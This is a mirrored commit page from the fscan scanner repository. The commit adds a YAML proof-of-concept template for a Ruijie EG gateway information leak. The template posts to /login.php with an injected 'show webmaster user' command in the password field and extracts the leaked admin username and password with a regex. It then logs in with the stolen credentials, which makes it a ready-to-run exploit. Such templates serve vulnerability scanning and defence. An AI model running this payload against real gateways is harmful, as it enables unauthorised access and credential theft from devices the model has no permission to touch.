mirror of
https://github.com/shadow1ng/fscan.git
synced 2026-09-27 05:31:53 +08:00
加入fcgi协议未授权命令执行扫描,优化poc模块
This commit is contained in:
@@ -0,0 +1,24 @@
|
||||
name: poc-yaml-ruijie-eg-info-leak
|
||||
rules:
|
||||
- method: POST
|
||||
path: /login.php
|
||||
headers:
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
body: |
|
||||
username=admin&password=admin?show+webmaster+user
|
||||
expression: "true"
|
||||
search: |
|
||||
{"data":".*?(?P<username>\w+)\s?(?P<password>\w+)","status":1}
|
||||
- method: POST
|
||||
path: /login.php
|
||||
headers:
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
body: |
|
||||
username={{username}}&password={{password}}
|
||||
expression: |
|
||||
response.status == 200 && response.body.bcontains(b"{\"data\":\"0\",\"status\":1}")
|
||||
detail:
|
||||
author: Search?=Null
|
||||
description: "Ruijie EG网关信息泄漏"
|
||||
links:
|
||||
- https://mp.weixin.qq.com/s/jgNyTHSqWA5twyk5tfSQUQ
|
||||
Reference in New Issue
Block a user